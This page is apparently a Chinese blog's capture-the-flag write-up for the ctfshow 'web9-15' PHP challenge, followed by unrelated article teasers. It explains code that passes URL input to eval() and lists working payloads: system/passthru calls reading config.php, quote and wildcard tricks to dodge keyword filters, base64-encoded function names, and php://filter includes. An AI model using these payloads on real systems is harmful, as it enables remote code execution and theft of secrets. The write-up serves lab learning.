当前位置：首页 > news >正文

【WEB】ctfshow-萌新-web9-15

news 2026/3/26 22:59:58

文章目录

题目介绍：
题目分析：
payload：

题目介绍：

ctfshow-萌新计划-web9-15

<?php
# flag in config.php
include("config.php");
if(isset($_GET['c'])){$c = $_GET['c'];if(preg_match("/system|exec|highlight/i",$c)){eval($c);}else{die("cmd error");}
}else{highlight_file(__FILE__);
}
?>

题目分析：

包含配置文件：
- include("config.php");
- 这行代码包含了一个名为config.php的文件，该文件可能包含一些配置信息，比如flag。
检查GET参数c是否存在：
- if(isset($_GET['c'])){ ... }
- 这段代码检查是否有通过GET方法提交的c参数。
获取c参数的值：
- $c = $_GET['c'];
- 将GET参数c的值赋给变量$c。
正则表达式匹配：
- if(preg_match("/system|exec|highlight/i",$c)){ ... }
- 使用preg_match函数检查变量$c是否包含system、exec或highlight这些字符串（不区分大小写）。这个正则表达式检查的目的是尝试防止某些特定的命令执行函数被调用。
执行代码：
- eval($c);
- 如果正则表达式匹配成功，eval函数将执行变量$c中包含的PHP代码。这是一个非常危险的操作，因为它允许执行任意PHP代码，可能导致严重的安全问题。
错误处理：
- die("cmd error");
- 如果正则表达式没有匹配，脚本将终止执行并输出错误信息。
高亮显示当前文件：
- highlight_file(__FILE__);
- 如果没有提交c参数，脚本将使用highlight_file函数显示当前脚本文件的源代码。

payload：

?c=system('cat config.php');?c=system('tac config.php');?c=show_source('config.php');?c=passthru('tac config.php');?c=passthru('more config.php');?c=passthru('more confi***hp');?c=passthru('tac con\fig*')?>?c=passthru('c""at con""fig?ph""p')?>?c=passthru("ca''t `ls`")?>?c=$a=base64_decode('c3lzdGVt');$b=base64_decode('Y2F0IGNvbmZpZy5waHA=');$a($b);?c=$a=opendir('/var/www/html');$e=readdir($a);$e=readdir($a);$e=readdir($a);echo%20readfile($e);?c= include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=config.php?c=include $_GET[a];&a=php://filter/read=convert.base64-encode/resource=config.php?a=cat config.php&c=echo`$_REQUEST[a]`;……

我不会接受我不要的未来，哪怕是命中注定。

【WEB】ctfshow-萌新-web9-15

文章目录题目介绍：题目分析：payload： 题目介绍： ctfshow-萌新计划-web9-15 <?php # flag in config.php include("config.php"); if(isset($_GET[c])){$c $_GET[c];if(preg_match("/system|exec|highlight…...

编程日记 2024/8/1 14:06:49

【Vulnhub靶场AI-WEB-1.0打靶教程】

第一步：查看虚拟机的ip 第二步：扫描ip下开放的80端口第三步：扫描查到的ip地址下的目录第四步：访问查到的目录访问robot.txt 第五步:访问robot.txt显示出的目录第六步：打开kali终端，使用sqlmap功能 sq…...

编程日记 2024/8/1 14:04:47

html实现酷炫美观的可视化大屏(十种风格示例，附源码)

文章目录完整效果演示1.蓝色流线风的可视化大屏1.1 大屏效果1.2 大屏代码1.3 大屏下载 2.地图模块风的可视化大屏2.1 大屏效果2.2 大屏代码2.3 大屏下载 3.科技轮动风的可视化大屏3.1 大屏效果3.2 大屏代码3.3 大屏下载 4.蓝色海洋风的可视化大屏4.1 大屏效果4.2 大屏代码4.3 …...

编程日记 2024/8/1 14:02:44

【C++BFS算法二分查找】2812. 找出最安全路径

本文涉及知识点 CBFS算法 C二分查找 LeetCode2812. 找出最安全路径给你一个下标从 0 开始、大小为 n x n 的二维矩阵 grid ，其中 (r, c) 表示： 如果 grid[r][c] 1 ，则表示一个存在小偷的单元格如果 grid[r][c] 0 ，则表示一…...

编程日记 2024/8/1 14:01:43

轻触开关 KH-4.5X4.5X5.5H-STM

品　　牌： kinghelm(金航标) 厂家型号： KH-4.5X4.5X5.5H-STM 封装： SMD 商品毛重： 0.317克(g) 包装方式： 编带...

编程日记 2024/8/1 14:00:41

3.redis客户端

1.命令行客户端在安装redis的时候就已经安装好了，就是redis-cli redis-cli -h 127.0.0.1 -p 6379 -a 123456 -a 表示密码 -h 表示ip，不配置默认为本机 127.0.0.1 -p 表示端口，不配置默认为 6379 进入后可以输入ping，返回pong代表…...

编程日记 2024/8/1 13:59:40

Rust配置国内源，解决安装依赖慢问题

温馨提示：最新内容仅在原文更新。国内源使用字节的RsProxy https://rsproxy.cn/ 解决rust-analyzer加载时间过长(请参考本文) 配置环境变量 Mac export RUSTUP_DIST_SERVER"https://rsproxy.cn" export RUSTUP_UPDATE_ROOT"https://rsproxy.cn/r…...

编程日记 2024/8/1 13:58:39

AI学习指南机器学习篇- Q学习的参数与调优

AI学习指南机器学习篇- Q学习的参数与调优在强化学习领域中，Q学习是一种经典的算法，可以用来解决各种问题，包括游戏和机器人控制等。Q学习算法的性能很大程度上取决于一些重要的参数，例如学习率和折扣因子。本文将介绍这些参数的…...

编程日记 2024/8/1 13:57:38

《小迪安全》学习笔记02

域名默认存放目录和IP默认存放目录不一样。 IP地址是WWW文件里的，域名访问是WWW里的一个子目录里的（比如是blog）。 Nmap: Web源码拓展拿到一个网站的源码，要分析这几个方面↑。不同类型产生的漏洞类型也不一样在网站中&…...

编程日记 2024/8/1 13:56:37

C语言：自定义类型进阶（结构体、联合体、枚举）

自定义类型（结构体、联合体、枚举） 一、结构体（一）结构体的内存对齐1、结构体内存对齐规则（1）引子（2）offsetof 宏函数（3）内存对齐原理（4&#xff…...

编程日记 2024/8/1 13:55:36

SPSSAU | 最好最差权重BWM原理及案例实操分析

BWM（best-worse-method，最好最差法）是一种多准则决策方法，由Jafar Rezaei于2015年提出，其通常用于确定决策标准的权重。其原理是比如5个指标，如果以前AHP就需要5个指标两两的相对重要性数据。但是现在简化为…...

编程日记 2024/8/1 13:54:36

docker安装elasticsearch（es） docker官网 https://hub.docker.com/ https://www.cnblogs.com/balloon72/p/13177872.html 1、拉取最新项目elasticsearch docker pull elasticsearch:8.14.3lscpu 查看架构 2、构建环境 mkdir -p /data/elasticsear…...

编程日记 2024/8/1 13:53:35

02 RabbitMQ：下载安装

02 RabbitMQ：下载&安装 1. 下载&安装1.1. 官网1.2. Docker方式1.2.1. 下载镜像1.2.2. 启动1.2.3. 登录验证 1. 下载&安装 1.1. 官网 RabbitMQ: One broker to queue them all | RabbitMQ 1.2. Docker方式 1.2.1. 下载镜像 # docker pull 镜像名称[…...

编程日记 2024/8/1 13:52:32

mmcv库出现No module named ‘mmcv._ext

遇到 "No module named mmcv._ext" 这个错误通常意味着你的 Python 环境中缺少 mmcv 库的扩展模块 _ext。mmcv（MMDetection 训练工具箱的核心库）通常依赖于 _ext 模块来提供一些高性能的操作，这些操作是用 C/C 实现的，并…...

编程日记 2024/8/1 13:51:30

防止xss（跨站脚本攻击）

1、输出数据时进行转义：这是最基本的预防措施。确保在输出数据到HTML时对特殊字符进行适当的转义，以防止它们被解释为HTML或JavaScript代码。PHP中可以使用htmlspecialchars()、strip_tags()、htmlentities函数来实现这一点。 echo htmlspecialchars($d…...

编程日记 2024/8/1 13:50:29

django小型超市库存与销售管理系统-计算机毕业设计源码46608

摘要随着信息技术的快速发展，超市库存与销售管理面临着前所未有的挑战与机遇。为了提升超市的运营效率，优化库存管理，并增强销售数据的分析能力，我们基于Django框架设计并开发了一套小型超市库存与销售管理系统。该系统充分利用…...

编程日记 2024/8/1 13:48:28

项目实战_表白墙（简易版）

你能学到什么一个比较简单的项目：表白墙（简易版），浏览器：谷歌升级版将在下个博客发布效果如下正文说明我们是从0开始一步一步做这个项目的，里面的各种问题，我也会以第一人称视角来解…...

编程日记 2024/8/1 13:47:27

优化 Spring Boot 项目启动速度：高效管理大量 Bean 注入

个人名片 🎓作者简介：java领域优质创作者 🌐个人主页：码农阿豪 📞工作室：新空间代码工作室（提供各种软件服务） 💌个人邮箱：[2435024119@qq.com] 📱个人微信：15279484656 🌐个人导航网站：www.forff.top 💡座右铭：总有人要赢。为什么不能是我呢？专栏导…...

编程日记 2024/8/1 13:46:26

《LeetCode热题100》---＜5.普通数组篇六道＞

本篇博客讲解LeetCode热题100道普通数组篇中的六道题第一道：最大子数组和（中等） 第二道：合并区间（中等） 第一道：最大子数组和（中等） 法一：贪心算法 class So…...

编程日记 2024/8/1 13:45:25

【Hot100】LeetCode—169. 多数元素

目录题目1- 思路2- 实现⭐169. 多数元素——题解思路 3- ACM 实现题目原题连接：169. 多数元素 1- 思路定义两个变量一个是 count：维护当前元素的出现次数一个是 ret ：维护当前元素思路遍历整个数组**①如果 count 0 **&#xff…...

编程日记 2024/8/1 13:44:23

PotPlayer跨语言字幕解决方案：基于百度翻译API的实时字幕转换工具

PotPlayer跨语言字幕解决方案：基于百度翻译API的实时字幕转换工具【免费下载链接】PotPlayer_Subtitle_Translate_Baidu PotPlayer 字幕在线翻译插件 - 百度平台项目地址: https://gitcode.com/gh_mirrors/po/PotPlayer_Subtitle_Translate_Baidu 在全球化…...

编程新知 2026/3/26 21:30:00